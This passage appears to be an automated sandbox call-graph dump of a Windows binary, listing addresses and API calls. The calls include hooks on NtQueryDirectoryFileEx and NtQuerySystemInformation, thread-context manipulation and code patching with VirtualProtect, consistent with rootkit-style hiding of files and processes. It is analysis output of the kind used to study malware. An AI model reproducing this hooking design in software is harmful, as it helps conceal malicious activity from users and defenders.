EnterCriticalSection 8382->8395 8790 140ae86f440 GetProcessHeap 8396 140ae87494f 8397 140ae87495e 8396->8397 8398 140ae874968 8396->8398 8400 140ae86c5ac LeaveCriticalSection 8397->8400 8147 140ae865fcc 8148 140ae865fd3 8147->8148 8149 140ae866000 VirtualProtect 8148->8149 8151 140ae865f10 8148->8151 8150 140ae866029 GetLastError 8149->8150 8149->8151 8150->8151 8791 140ae86824c 8792 140ae868270 __scrt_acquire_startup_lock 8791->8792 8793 140ae86b581 8792->8793 8794 140ae86cb10 __std_exception_copy 13 API calls 8792->8794 8795 140ae86b5aa 8794->8795 8401 140ae86ad48 8402 140ae869324 _CreateFrameInfo 9 API calls 8401->8402 8403 140ae86ad7d 8402->8403 8404 140ae869324 _CreateFrameInfo 9 API calls 8403->8404 8405 140ae86ad8b __except_validate_context_record 8404->8405 8406 140ae869324 _CreateFrameInfo 9 API calls 8405->8406 8407 140ae86adcf 8406->8407 8408 140ae869324 _CreateFrameInfo 9 API calls 8407->8408 8409 140ae86add8 8408->8409 8410 140ae869324 _CreateFrameInfo 9 API calls 8409->8410 8411 140ae86ade1 8410->8411 8424 140ae86993c 8411->8424 8414 140ae869324 _CreateFrameInfo 9 API calls 8415 140ae86ae11 __CxxCallCatchBlock 8414->8415 8416 140ae869978 __CxxCallCatchBlock 9 API calls 8415->8416 8420 140ae86aec2 8416->8420 8417 140ae86aeeb __CxxCallCatchBlock 8418 140ae869324 _CreateFrameInfo 9 API calls 8417->8418 8419 140ae86aefe 8418->8419 8421 140ae869324 _CreateFrameInfo 9 API calls 8419->8421 8420->8417 8422 140ae868ff8 __CxxCallCatchBlock 9 API calls 8420->8422 8423 140ae86af07 8421->8423 8422->8417 8425 140ae869324 _CreateFrameInfo 9 API calls 8424->8425 8426 140ae86994d 8425->8426 8427 140ae869958 8426->8427 8428 140ae869324 _CreateFrameInfo 9 API calls 8426->8428 8429 140ae869324 _CreateFrameInfo 9 API calls 8427->8429 8428->8427 8430 140ae869969 8429->8430 8430->8414 8430->8415 8796 140ae874848 8799 140ae86904c 8796->8799 8800 140ae869076 8799->8800 8801 140ae869064 8799->8801 8803 140ae869324 _CreateFrameInfo 9 API calls 8800->8803 8801->8800 8802 140ae86906c 8801->8802 8805 140ae869324 _CreateFrameInfo 9 API calls 8802->8805 8806 140ae869074 8802->8806 8804 140ae86907b 8803->8804 8804->8806 8807 140ae869324 _CreateFrameInfo 9 API calls 8804->8807 8808 140ae86909b 8805->8808 8807->8806 8809 140ae869324 _CreateFrameInfo 9 API calls 8808->8809 8810 140ae8690a8 8809->8810 8811 140ae86c2f4 14 API calls 8810->8811 8812 140ae8690b1 8811->8812 8813 140ae86c2f4 14 API calls 8812->8813 8814 140ae8690bd 8813->8814 8604 140ae86b0d4 8611 140ae86b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8604->8611 8605 140ae86b0fb 8606 140ae869324 _CreateFrameInfo 9 API calls 8605->8606 8607 140ae86b100 8606->8607 8608 140ae869324 _CreateFrameInfo 9 API calls 8607->8608 8609 140ae86b10b __FrameHandler3::GetHandlerSearchState 8607->8609 8608->8609 8610 140ae8699cc 9 API calls Is_bad_exception_allowed 8610->8611 8611->8605 8611->8609 8611->8610 8613 140ae8699f4 8611->8613 8614 140ae869324 _CreateFrameInfo 9 API calls 8613->8614 8615 140ae869a02 8614->8615 8615->8611 8815 140ae862e54 8817 140ae862ea8 8815->8817 8816 140ae862ec3 8817->8816 8819 140ae8637f4 8817->8819 8820 140ae86388a 8819->8820 8822 140ae863819 8819->8822 8820->8816 8821 140ae863f88 StrCmpNIW 8821->8822 8822->8820 8822->8821 8823 140ae861e08 StrCmpIW StrCmpW 8822->8823 8823->8822 8616 140ae8686d0 8619 140ae8690c0 8616->8619 8618 140ae8686f9 8620 140ae8690e1 8619->8620 8621 140ae869116 8619->8621 8620->8621 8623 140ae86c328 8620->8623 8621->8618 8624 140ae86c335 8623->8624 8625 140ae86c33f 8623->8625 8624->8625 8627 140ae86c35a 8624->8627 8626 140ae86d1f4 __std_exception_copy 13 API calls 8625->8626 8631 140ae86c346 8626->8631 8629 140ae86c352 8627->8629 8630 140ae86d1f4 __std_exception_copy 13 API calls 8627->8630 8628 140ae86d04c _invalid_parameter_noinfo 38 API calls 8628->8629 8629->8621 8630->8631 8631->8628 8152 140ae8719d0 8153 140ae86e864 56 API calls 8152->8153 8154 140ae8719d9 8153->8154 8824 140ae87465f 8825 140ae874677 8824->8825 8831 140ae8746e2 8824->8831 8826 140ae869324 _CreateFrameInfo 9 API calls 8825->8826 8825->8831 8827 140ae8746c4 8826->8827 8828 140ae869324 _CreateFrameInfo 9 API calls 8827->8828 8829 140ae8746d9 8828->8829 8830 140ae86c2f4 14 API calls 8829->8830 8830->8831 8832 140ae87485e 8833 140ae869324 _CreateFrameInfo 9 API calls 8832->8833 8834 140ae87486c 8833->8834 8835 140ae874877 8834->8835 8836 140ae869324 _CreateFrameInfo 9 API calls 8834->8836 8836->8835 8155 140ae8625dc 8156 140ae86265a _invalid_parameter_noinfo 8155->8156 8157 140ae8626bf GetFileType 8156->8157 8163 140ae862777 8156->8163 8158 140ae8626e1 8157->8158 8159 140ae8626cd StrCpyW 8157->8159 8160 140ae861ad4 4 API calls 8158->8160 8164 140ae8626ee 8159->8164 8160->8164 8161 140ae863f88 StrCmpNIW 8161->8164 8162 140ae863708 4 API calls 8162->8164 8164->8161 8164->8162 8164->8163 8165 140ae861dd4 2 API calls 8164->8165 8165->8164 8632 140ae86f6dc 8633 140ae86f6e8 8632->8633 8635 140ae86f70f 8633->8635 8636 140ae871c0c 8633->8636 8637 140ae871c11 8636->8637 8638 140ae871c4c 8636->8638 8639 140ae871c44 8637->8639 8640 140ae871c32 DeleteCriticalSection 8637->8640 8638->8633 8641 140ae86d2a0 __free_lconv_num 13 API calls 8639->8641 8640->8639 8640->8640 8641->8638 8166 140ae86c1d8 8167 140ae86c1f1 8166->8167 8169 140ae86c209 8166->8169 8168 140ae86d2a0 __free_lconv_num 13 API calls 8167->8168 8167->8169 8168->8169 8642 140ae862ed8 8643 140ae862f35 8642->8643 8644 140ae862f50 8643->8644 8645 140ae8638a8 3 API calls 8643->8645 8645->8644 8837 140ae86d658 8838 140ae86d67d 8837->8838 8843 140ae86d694 8837->8843 8839 140ae86d1f4 __std_exception_copy 13 API calls 8838->8839 8840 140ae86d682 8839->8840 8842 140ae86d04c _invalid_parameter_noinfo 38 API calls 8840->8842 8841 140ae86d724 8844 140ae86bb54 13 API calls 8841->8844 8866 140ae86d68d 8842->8866 8843->8841 8851 140ae86d7b6 8843->8851 8863 140ae86d6da 8843->8863 8870 140ae86d894 8843->8870 8932 140ae86da18 8843->8932 8845 140ae86d77c 8844->8845 8848 140ae86d784 8845->8848 8854 140ae86d7d7 8845->8854 8850 140ae86d2a0 __free_lconv_num 13 API calls 8848->8850 8849 140ae86d836 8852 140ae86d2a0 __free_lconv_num 13 API calls 8849->8852 8853 140ae86d78b 8850->8853 8858 140ae86d2a0 __free_lconv_num 13 API calls 8851->8858 8865 140ae86d6fd 8851->8865 8864 140ae86d841 8852->8864 8855 140ae86d2a0 __free_lconv_num 13 API calls 8853->8855 8853->8865 8854->8849 8854->8854 8867 140ae86d87c 8854->8867 8969 140ae870eb8 8854->8969 8855->8853 8856 140ae86d2a0 __free_lconv_num 13 API calls 8856->8866 8857 140ae86d85a 8862 140ae86d2a0 __free_lconv_num 13 API calls 8857->8862 8858->8851 8859 140ae86d2a0 __free_lconv_num 13 API calls 8859->8863 8861 140ae86d2a0 __free_lconv_num 13 API calls 8861->8864 8862->8866 8863->8859 8863->8865 8864->8857 8864->8861 8865->8856 8868 140ae86d06c _invalid_parameter_noinfo 17 API calls 8867->8868 8869 140ae86d891 8868->8869 8871 140ae86d8c2 8870->8871 8871->8871 8872 140ae86d8de 8871->8872 8873 140ae86d220 __std_exception_copy 13 API calls 8871->8873 8872->8843 8874 140ae86d90d 8873->8874 8875 140ae86d926 8874->8875 8876 140ae870eb8 38 API calls 8874->8876 8877 140ae870eb8 38 API calls 8875->8877 8879 140ae86d9fc 8875->8879 8876->8875 8878 140ae86d943 8877->8878 8878->8879 8881 140ae86d97f 8878->8881 8882 140ae86d962 8878->8882 8883 140ae86d98d 8878->8883 8880 140ae86d06c _invalid_parameter_noinfo 17 API calls 8879->8880 8892 140ae86da17 8880->8892 8886 140ae86d2a0 __free_lconv_num 13 API calls 8881->8886 8885 140ae86d220 __std_exception_copy 13 API calls 8882->8885 8884 140ae86d977 8883->8884 8978 140ae86eee0 8883->8978 8884->8881 8889 140ae86d2a0 __free_lconv_num 13 API calls 8884->8889 8890 140ae86d96d 8885->8890 8886->8879 8888 140ae86da7a 8897 140ae86da8c 8888->8897 8901 140ae86daa1 _invalid_parameter_noinfo 8888->8901 8889->8881 8893 140ae86d2a0 __free_lconv_num 13 API calls 8890->8893 8891 140ae86d9b5 8894 140ae86d9d0 8891->8894 8895 140ae86d9ba 8891->8895 8892->8888 8987 140ae8713d8 8892->8987 8893->8884 8899 140ae86d2a0 __free_lconv_num 13 API calls 8894->8899 8898 140ae86d2a0 __free_lconv_num 13 API calls 8895->8898 8900 140ae86d894 52 API calls 8897->8900 8898->8884 8899->8881 8914 140ae86da9c 8900->8914 8903 140ae86dd78 14 API calls 8901->8903 8902 140ae868070 _invalid_parameter_noinfo 8 API calls 8904 140ae86dd64 8902->8904 8905 140ae86db0b 8903->8905 8904->8843 8906 140ae86f198 9 API calls 8905->8906 8907 140ae86db1a 8905->8907 8906->8907 8996 140ae86d30c 8907->8996 8910 140ae86dba8 8911 140ae86d894 52 API calls 8910->8911 8913 140ae86dbb8 8911->8913 8912 140ae86dd78 14 API calls 8924 140ae86dbd2 8912->8924 8913->8914 8915 140ae86d2a0 __free_lconv_num 13 API calls 8913->8915 8914->8902 8915->8914 8916 140ae86f198 9 API calls 8916->8924 8918 140ae86d894 52 API calls 8918->8924 8919 140ae86dcc8 FindNextFileW 8921 140ae86dce0 8919->8921 8919->8924 8920 140ae86dd2a 8922 140ae86dd38 FindClose 8920->8922 8925 140ae86d2a0 __free_lconv_num 13 API calls 8920->8925 8923 140ae86dd0c FindClose 8921->8923 9040 140ae870b20 8921->9040 8922->8914 8926 140ae86dd48 8922->8926 8923->8914 8929 140ae86dd1c 8923->8929 8924->8912 8924->8916 8924->8918 8924->8919 8924->8920 8927 140ae86d2a0 13 API calls __free_lconv_num 8924->8927 9018 140ae86d4ac 8924->9018 8925->8922 8930 140ae86d2a0 __free_lconv_num 13 API calls 8926->8930 8927->8924 8931 140ae86d2a0 __free_lconv_num 13 API calls 8929->8931 8930->8914 8931->8914 8933 140ae86da7a 8932->8933 8934 140ae86da58 8932->8934 8936 140ae86da8c 8933->8936 8938 140ae86daa1 _invalid_parameter_noinfo 8933->8938 8934->8933 8935 140ae8713d8 38 API calls 8934->8935 8935->8934 8937 140ae86d894 56 API calls 8936->8937 8963 140ae86da9c 8937->8963 8940 140ae86dd78 14 API calls 8938->8940 8939 140ae868070 _invalid_parameter_noinfo 8 API calls 8941 140ae86dd64 8939->8941 8942 140ae86db0b 8940->8942 8941->8843 8943 140ae86db1a 8942->8943 8944 140ae86f198 9 API calls 8942->8944 8945 140ae86d30c 16 API calls 8943->8945 8944->8943 8946 140ae86db7b FindFirstFileExW 8945->8946 8947 140ae86dba8 8946->8947 8951 140ae86dbd2 8946->8951 8948 140ae86d894 56 API calls 8947->8948 8950 140ae86dbb8 8948->8950 8949 140ae86dd78 14 API calls 8949->8951 8952 140ae86d2a0 __free_lconv_num 13 API calls 8950->8952 8950->8963 8951->8949 8953 140ae86f198 9 API calls 8951->8953 8954 140ae86d4ac 16 API calls 8951->8954 8955 140ae86d894 56 API calls 8951->8955 8956 140ae86dcc8 FindNextFileW 8951->8956 8957 140ae86dd2a 8951->8957 8959 140ae86d2a0 13 API calls __free_lconv_num 8951->8959 8952->8963 8953->8951 8954->8951 8955->8951 8956->8951 8958 140ae86dce0 8956->8958 8960 140ae86dd38 FindClose 8957->8960 8962 140ae86d2a0 __free_lconv_num 13 API calls 8957->8962 8961 140ae86dd0c FindClose 8958->8961 8965 140ae870b20 38 API calls 8958->8965 8959->8951 8960->8963 8964 140ae86dd48 8960->8964 8961->8963 8966 140ae86dd1c 8961->8966 8962->8960 8963->8939 8967 140ae86d2a0 __free_lconv_num 13 API calls 8964->8967 8965->8961 8968 140ae86d2a0 __free_lconv_num 13 API calls 8966->8968 8967->8963 8968->8963 8974 140ae870ed5 8969->8974 8970 140ae870eda 8971 140ae86d1f4 __std_exception_copy 13 API calls 8970->8971 8972 140ae870ef0 8970->8972 8973 140ae870ee4 8971->8973 8972->8854 8975 140ae86d04c _invalid_parameter_noinfo 38 API calls 8973->8975 8974->8970 8974->8972 8976 140ae870f24 8974->8976 8975->8972 8976->8972 8977 140ae86d1f4 __std_exception_copy 13 API calls 8976->8977 8977->8973 8979 140ae86ef02 8978->8979 8980 140ae86ef1f 8978->8980 8979->8980 8981 140ae86ef10 8979->8981 8983 140ae86ef29 8980->8983 9048 140ae8719f0 8980->9048 8984 140ae86d1f4 __std_exception_copy 13 API calls 8981->8984 9055 140ae871a40 8983->9055 8986 140ae86ef15 _invalid_parameter_noinfo 8984->8986 8986->8891 8988 140ae8713e0 8987->8988 8989 140ae8713f5 8988->8989 8991 140ae87140e 8988->8991 8990 140ae86d1f4 __std_exception_copy 13 API calls 8989->8990 8992 140ae8713fa 8990->8992 8994 140ae86dd78 14 API calls 8991->8994 8995 140ae871405 8991->8995 8993 140ae86d04c _invalid_parameter_noinfo 38 API calls 8992->8993 8993->8995 8994->8995 8995->8892 8997 140ae86d336 8996->8997 8998 140ae86d35a 8996->8998 9002 140ae86d2a0 __free_lconv_num 13 API calls 8997->9002 9009 140ae86d345 FindFirstFileExW 8997->9009 8999 140ae86d3bf 8998->8999 9000 140ae86d35f 8998->9000 9001 140ae86ec58 MultiByteToWideChar 8999->9001 9003 140ae86d374 9000->9003 9004 140ae86d2a0 __free_lconv_num 13 API calls 9000->9004 9000->9009 9012 140ae86d3db 9001->9012 9002->9009 9005 140ae86c5d0 14 API calls 9003->9005 9004->9003 9005->9009 9006 140ae86d3e2 GetLastError 9007 140ae86d184 13 API calls 9006->9007 9010 140ae86d3ef 9007->9010 9008 140ae86d420 9008->9009 9013 140ae86ec58 MultiByteToWideChar 9008->9013 9009->8910 9009->8924 9014 140ae86d1f4 __std_exception_copy 13 API calls 9010->9014 9011 140ae86d413 9016 140ae86c5d0 14 API calls 9011->9016 9012->9006 9012->9008 9012->9011 9015 140ae86d2a0 __free_lconv_num 13 API calls 9012->9015 9017 140ae86d47a 9013->9017 9014->9009 9015->9011 9016->9008 9017->9006 9017->9009 9019 140ae86d4d6 9018->9019 9020 140ae86d4fa 9018->9020 9023 140ae86d2a0 __free_lconv_num 13 API calls 9019->9023 9025 140ae86d4e5 9019->9025 9021 140ae86d500 9020->9021 9022 140ae86d55f 9020->9022 9021->9025 9026 140ae86d515 9021->9026 9029 140ae86d2a0 __free_lconv_num 13 API calls 9021->9029 9024 140ae86ece8 WideCharToMultiByte 9022->9024 9023->9025 9033 140ae86d583 9024->9033 9025->8924 9027 140ae86c5d0 14 API calls 9026->9027 9027->9025 9028 140ae86d58a GetLastError 9030 140ae86d184 13 API calls 9028->9030 9029->9026 9032 140ae86d597 9030->9032 9031 140ae86ece8 WideCharToMultiByte 9037 140ae86d629 9031->9037 9038 140ae86d1f4 __std_exception_copy 13 API calls 9032->9038 9033->9028 9034 140ae86d5bb 9033->9034 9035 140ae86d2a0 __free_lconv_num 13 API calls 9033->9035 9039 140ae86d5c7 9033->9039 9036 140ae86c5d0 14 API calls 9034->9036 9035->9034 9036->9039 9037->9025 9037->9028 9038->9025 9039->9025 9039->9031 9041 140ae870b52 9040->9041 9042 140ae86d1f4 __std_exception_copy 13 API calls 9041->9042 9047 140ae870b67 _invalid_parameter_noinfo 9041->9047 9043 140ae870b5c 9042->9043 9044 140ae86d04c _invalid_parameter_noinfo 38 API calls 9043->9044 9044->9047 9045 140ae868070 _invalid_parameter_noinfo 8 API calls 9046 140ae870ea8 9045->9046 9046->8923 9047->9045 9049 140ae871a12 HeapSize 9048->9049 9050 140ae8719f9 9048->9050 9051 140ae86d1f4 __std_exception_copy 13 API calls 9050->9051 9052 140ae8719fe 9051->9052 9053 140ae86d04c _invalid_parameter_noinfo 38 API calls 9052->9053 9054 140ae871a09 9053->9054 9054->8983 9056 140ae871a55 9055->9056 9057 140ae871a5f 9055->9057 9058 140ae86c5d0 14 API calls 9056->9058 9059 140ae871a64 9057->9059 9065 140ae871a6b __std_exception_copy 9057->9065 9063 140ae871a5d 9058->9063 9060 140ae86d2a0 __free_lconv_num 13 API calls 9059->9060 9060->9063 9061 140ae871a71 9064 140ae86d1f4 __std_exception_copy 13 API calls 9061->9064 9062 140ae871a9e HeapReAlloc 9062->9063 9062->9065 9063->8986 9064->9063 9065->9061 9065->9062 9066 140ae86b470 __std_exception_copy 2 API calls 9065->9066 9066->9065 8170 140ae86f3e4 8171 140ae86f41d 8170->8171 8173 140ae86f3ee 8170->8173 8172 140ae86f403 FreeLibrary 8172->8173 8173->8171 8173->8172 8174 140ae8733e4 8175 140ae8733f5 CloseHandle 8174->8175 8176 140ae8733fb 8174->8176 8175->8176 8177 140ae8663e3 8178 140ae8663f0 8177->8178 8179 140ae86655a 8178->8179 8180 140ae8663fc GetThreadContext 8178->8180 8182 140ae866581 VirtualProtect FlushInstructionCache 8179->8182 8184 140ae86663e 8179->8184 8180->8179 8181 140ae866422 8180->8181 8181->8179 8186 140ae866449 8181->8186 8182->8179 8183 140ae8664cd 8185 140ae86665e 8184->8185 8195 140ae864b20 8184->8195 8199 140ae865530 GetCurrentProcess 8185->8199 8186->8183 8189 140ae8664a6 SetThreadContext 8186->8189 8189->8183 8190 140ae8666b7 8193 140ae868070 _invalid_parameter_noinfo 8 API calls 8190->8193 8191 140ae866677 ResumeThread 8192 140ae866663 8191->8192 8192->8190 8192->8191 8194 140ae8666ff 8193->8194 8197 140ae864b3c 8195->8197 8196 140ae864b9f 8196->8185 8197->8196 8198 140ae864b52 VirtualFree 8197->8198 8198->8197 8200 140ae86554c 8199->8200 8201 140ae865562 VirtualProtect FlushInstructionCache 8200->8201 8202 140ae865593 8200->8202 8201->8200 8202->8192 8440 140ae867f60 8441 140ae867f81 8440->8441 8442 140ae867f7c 8440->8442 8444 140ae868090 8442->8444 8445 140ae868127 8444->8445 8446 140ae8680b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8444->8446 8445->8441 8446->8445 8447 140ae873960 8457 140ae868ca0 8447->8457 8449 140ae873988 8451 140ae869324 _CreateFrameInfo 9 API calls 8452 140ae873998 8451->8452 8453 140ae869324 _CreateFrameInfo 9 API calls 8452->8453 8454 140ae8739a1 8453->8454 8455 140ae86c2f4 14 API calls 8454->8455 8456 140ae8739aa 8455->8456 8458 140ae868cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8457->8458 8459 140ae868dd1 8458->8459 8460 140ae868d94 RtlUnwindEx 8458->8460 8459->8449 8459->8451 8460->8458 8646 140ae8706e0 8647 140ae8706e9 8646->8647 8651 140ae8706f9 8646->8651 8648 140ae86d1f4 __std_exception_copy 13 API calls 8647->8648 8649 140ae8706ee 8648->8649 8650 140ae86d04c _invalid_parameter_noinfo 38 API calls 8649->8650 8650->8651 8203 140ae86b7ea 8215 140ae86c2f4 8203->8215 8216 140ae86cab0 _invalid_parameter_noinfo 14 API calls 8215->8216 8217 140ae86c2fd 8216->8217 7604 140ae8627e8 NtQueryDirectoryFileEx 7605 140ae862998 7604->7605 7606 140ae862872 _invalid_parameter_noinfo 7604->7606 7606->7605 7607 140ae8628c9 GetFileType 7606->7607 7608 140ae8628d7 StrCpyW 7607->7608 7609 140ae8628ed 7607->7609 7610 140ae8628fc 7608->7610 7620 140ae861ad4 GetFinalPathNameByHandleW 7609->7620 7614 140ae86299d 7610->7614 7618 140ae862906 7610->7618 7612 140ae863f88 StrCmpNIW 7612->7614 7614->7605 7614->7612 7615 140ae863708 4 API calls 7614->7615 7616 140ae861dd4 2 API calls 7614->7616 7615->7614 7616->7614 7618->7605 7625 140ae863f88 7618->7625 7628 140ae863708 StrCmpIW 7618->7628 7632 140ae861dd4 7618->7632 7621 140ae861afe StrCmpNIW 7620->7621 7622 140ae861b3d 7620->7622 7621->7622 7623 140ae861b18 lstrlenW 7621->7623 7622->7610 7623->7622 7624 140ae861b2a StrCpyW 7623->7624 7624->7622 7626 140ae863f95 StrCmpNIW 7625->7626 7627 140ae863faa 7625->7627 7626->7627 7627->7618 7629 140ae863751 PathCombineW 7628->7629 7630 140ae86373a StrCpyW StrCatW 7628->7630 7631 140ae86375a 7629->7631 7630->7631 7631->7618 7633 140ae861df4 7632->7633 7634 140ae861deb 7632->7634 7633->7618 7635 140ae861530 2 API calls 7634->7635 7635->7633 8461 140ae865974 8462 140ae86597a 8461->8462 8473 140ae867fa0 8462->8473 8467 140ae865a77 _invalid_parameter_noinfo 8469 140ae865bfd 8467->8469 8472 140ae8659de 8467->8472 8486 140ae867b80 8467->8486 8468 140ae865cfb 8469->8468 8470 140ae865d77 VirtualProtect 8469->8470 8471 140ae865da3 GetLastError 8470->8471 8470->8472 8471->8472 8475 140ae867fab 8473->8475 8474 140ae8659bd 8474->8472 8482 140ae864400 8474->8482 8475->8474 8476 140ae86b470 __std_exception_copy 2 API calls 8475->8476 8477 140ae867fca 8475->8477 8476->8475 8480 140ae867fd5 8477->8480 8492 140ae8687b8 8477->8492 8496 140ae8687d8 8480->8496 8483 140ae86441d 8482->8483 8485 140ae86448c _invalid_parameter_noinfo 8483->8485 8505 140ae864670 8483->8505 8485->8467 8487 140ae867bc7 8486->8487 8530 140ae867950 8487->8530 8490 140ae868070 _invalid_parameter_noinfo 8 API calls 8491 140ae867bf1 8490->8491 8491->8467 8493 140ae8687c6 std::bad_alloc::bad_alloc 8492->8493 8500 140ae869178 8493->8500 8495 140ae8687d7 8497 140ae8687e6 std::bad_alloc::bad_alloc 8496->8497 8498 140ae869178 Concurrency::cancel_current_task 2 API calls 8497->8498 8499 140ae867fdb 8498->8499 8501 140ae869197 8500->8501 8502 140ae8691e2 RaiseException 8501->8502 8503 140ae8691c0 RtlPcToFileHeader 8501->8503 8502->8495 8504 140ae8691d8 8503->8504 8504->8502 8506 140ae864694 8505->8506 8507 140ae8646b7 8505->8507 8506->8507 8519 140ae864120 8506->8519 8508 140ae8646ed 8507->8508 8525 140ae864250 8507->8525 8511 140ae864250 2 API calls 8508->8511 8512 140ae86471d 8508->8512 8511->8512 8515 140ae864120 3 API calls 8512->8515 8517 140ae864753 8512->8517 8513 140ae864120 3 API calls 8514 140ae86476f 8513->8514 8516 140ae864250 2 API calls 8514->8516 8518 140ae86478b 8514->8518 8515->8517 8516->8518 8517->8513 8517->8514 8518->8485 8520 140ae864141 _invalid_parameter_noinfo 8519->8520 8521 140ae864196 VirtualQuery 8520->8521 8522 140ae8641ca VirtualAlloc 8520->8522 8523 140ae8641b0 8520->8523 8521->8520 8521->8523 8522->8523 8524 140ae8641fb GetLastError 8522->8524 8523->8507 8524->8520 8524->8523 8529 140ae864268 _invalid_parameter_noinfo 8525->8529 8526 140ae8642d7 8526->8508 8527 140ae8642bd VirtualQuery 8527->8526 8527->8529 8528 140ae864322 GetLastError 8528->8529 8529->8526 8529->8527 8529->8528 8531 140ae86796b 8530->8531 8532 140ae867981 SetLastError 8531->8532 8533 140ae86798f 8531->8533 8532->8533 8533->8490 8655 140ae8746f5 8656 140ae869324 _CreateFrameInfo 9 API calls 8655->8656 8657 140ae87470d 8656->8657 8658 140ae869324 _CreateFrameInfo 9 API calls 8657->8658 8659 140ae874728 8658->8659 8660 140ae869324 _CreateFrameInfo 9 API calls 8659->8660 8661 140ae87473c 8660->8661 8662 140ae869324 _CreateFrameInfo 9 API calls 8661->8662 8663 140ae87477e 8662->8663 9067 140ae868672 9068 140ae8690c0 __std_exception_copy 38 API calls 9067->9068 9069 140ae86869d 9068->9069 8218 140ae862ff0 8219 140ae863061 8218->8219 8220 140ae863384 8219->8220 8221 140ae86308d GetModuleHandleA 8219->8221 8222 140ae8630b1 8221->8222 8223 140ae86309f GetProcAddress 8221->8223 8222->8220 8224 140ae8630d8 StrCmpNIW 8222->8224 8223->8222 8224->8220 8230 140ae8630fd 8224->8230 8225 140ae861a30 6 API calls 8225->8230 8226 140ae86320f lstrlenW 8226->8230 8227 140ae8632b9 lstrlenW 8227->8230 8228 140ae861cfc StrCmpIW StrCmpW 8228->8230 8229 140ae863f88 StrCmpNIW 8229->8230 8230->8220 8230->8225 8230->8226 8230->8227 8230->8228 8230->8229 8534 140ae86f370 VirtualProtect 9070 140ae86f870 9071 140ae86f8a0 9070->9071 9073 140ae86f8c7 9070->9073 9072 140ae86cb10 __std_exception_copy 13 API calls 9071->9072 9071->9073 9077 140ae86f8b4 9071->9077 9072->9077 9074 140ae86f99c 9073->9074 9093 140ae86c558 EnterCriticalSection 9073->9093 9078 140ae86fab3 9074->9078 9080 140ae86fa03 9074->9080 9086 140ae86f9ca 9074->9086 9075 140ae86f904 9077->9073 9077->9075 9079 140ae86f949 9077->9079 9081 140ae86fac0 9078->9081 9095 140ae86c5ac LeaveCriticalSection 9078->9095 9082 140ae86d1f4 __std_exception_copy 13 API calls 9079->9082 9089 140ae86fa61 9080->9089 9094 140ae86c5ac LeaveCriticalSection 9080->9094 9085 140ae86f94e 9082->9085 9087 140ae86d04c _invalid_parameter_noinfo 38 API calls 9085->9087 9086->9080 9088 140ae86cab0 _invalid_parameter_noinfo 14 API calls 9086->9088 9087->9075 9090 140ae86f9f3 9088->9090 9092 140ae86cab0 14 API calls _invalid_parameter_noinfo 9089->9092 9091 140ae86cab0 _invalid_parameter_noinfo 14 API calls 9090->9091 9091->9080 9092->9089 8231 140ae86cbfc 8236 140ae86f3a0 8231->8236 8233 140ae86cc05 8234 140ae86cb10 __std_exception_copy 13 API calls 8233->8234 8235 140ae86cc22 __vcrt_uninitialize_ptd 8233->8235 8234->8235 8237 140ae86f3b5 8236->8237 8238 140ae86f3b1 8236->8238 8237->8238 8239 140ae86ef88 9 API calls 8237->8239 8238->8233 8239->8238 9096 140ae87387c 9097 140ae8738b4 __GSHandlerCheckCommon 9096->9097 9098 140ae8738e0 9097->9098 9100 140ae869a24 9097->9100 9101 140ae869324 _CreateFrameInfo 9 API calls 9100->9101 9102 140ae869a4e 9101->9102 9103 140ae869324 _CreateFrameInfo 9 API calls 9102->9103 9104 140ae869a5b 9103->9104 9105 140ae869324 _CreateFrameInfo 9 API calls 9104->9105 9106 140ae869a64 9105->9106 9106->9098 8240 140ae865ff9 8241 140ae866000 VirtualProtect 8240->8241 8242 140ae866029 GetLastError 8241->8242 8243 140ae865f10 8241->8243 8242->8243 8244 140ae8641f9 8245 140ae864146 _invalid_parameter_noinfo 8244->8245 8246 140ae864196 VirtualQuery 8245->8246 8247 140ae8641ca VirtualAlloc 8245->8247 8248 140ae8641b0 8245->8248 8246->8245 8246->8248 8247->8248 8249 140ae8641fb GetLastError 8247->8249 8249->8245 8249->8248 7571 140ae862300 NtQuerySystemInformation 7572 140ae86233c 7571->7572 7573 140ae862447 7572->7573 7581 140ae862355 7572->7581 7584 140ae862412 7572->7584 7574 140ae86244c 7573->7574 7575 140ae8624bb 7573->7575 7591 140ae8635c8 GetProcessHeap HeapAlloc 7574->7591 7576 140ae8624c0 7575->7576 7575->7584 7579 140ae8635c8 11 API calls 7576->7579 7578 140ae86238d StrCmpNIW 7578->7581 7582 140ae862464 7579->7582 7580 140ae8623b4 7580->7581 7585 140ae861d30 7580->7585 7581->7578 7581->7580 7581->7584 7582->7584 7586 140ae861d57 GetProcessHeap HeapAlloc 7585->7586 7587 140ae861db4 7585->7587 7586->7587 7588 140ae861d92 7586->7588 7587->7580 7597 140ae861cfc 7588->7597 7592 140ae86361b 7591->7592 7593 140ae8636d9 GetProcessHeap HeapFree 7592->7593 7594 140ae8636d4 7592->7594 7595 140ae863666 StrCmpNIW 7592->7595 7596 140ae861d30 6 API calls 7592->7596 7593->7582 7594->7593 7595->7592 7596->7592 7598 140ae861d1c GetProcessHeap HeapFree 7597->7598 7599 140ae861d13 7597->7599 7598->7587 7600 140ae861530 2 API calls 7599->7600 7600->7598 8535 140ae86c180 8538 140ae86bf38 8535->8538 8545 140ae86bf00 8538->8545 8546 140ae86bf15 8545->8546 8547 140ae86bf10 8545->8547 8549 140ae86bf1c 8546->8549 8548 140ae86bebc 13 API calls 8547->8548 8548->8546 8550 140ae86bf31 8549->8550 8551 140ae86bf2c 8549->8551 8553 140ae86bebc 8550->8553 8552 140ae86bebc 13 API calls 8551->8552 8552->8550 8557 140ae86bec1 8553->8557 8558 140ae86bef2 8553->8558 8554 140ae86beea 8556 140ae86d2a0 __free_lconv_num 13 API calls 8554->8556 8555 140ae86d2a0 __free_lconv_num 13 API calls 8555->8557 8556->8558 8557->8554 8557->8555 8664 140ae86b500 8669 140ae86c558 EnterCriticalSection 8664->8669 8250 140ae86820c 8257 140ae868f34 8250->8257 8253 140ae868219 8258 140ae869340 _CreateFrameInfo 9 API calls 8257->8258 8259 140ae868215 8258->8259 8259->8253 8260 140ae86c288 8259->8260 8261 140ae86cb10 __std_exception_copy 13 API calls 8260->8261 8262 140ae868222 8261->8262 8262->8253 8263 140ae868f48 8262->8263 8266 140ae8692dc 8263->8266 8265 140ae868f51 8265->8253 8267 140ae8692ed 8266->8267 8271 140ae869302 8266->8271 8268 140ae869c8c _CreateFrameInfo 6 API calls 8267->8268 8269 140ae8692f2 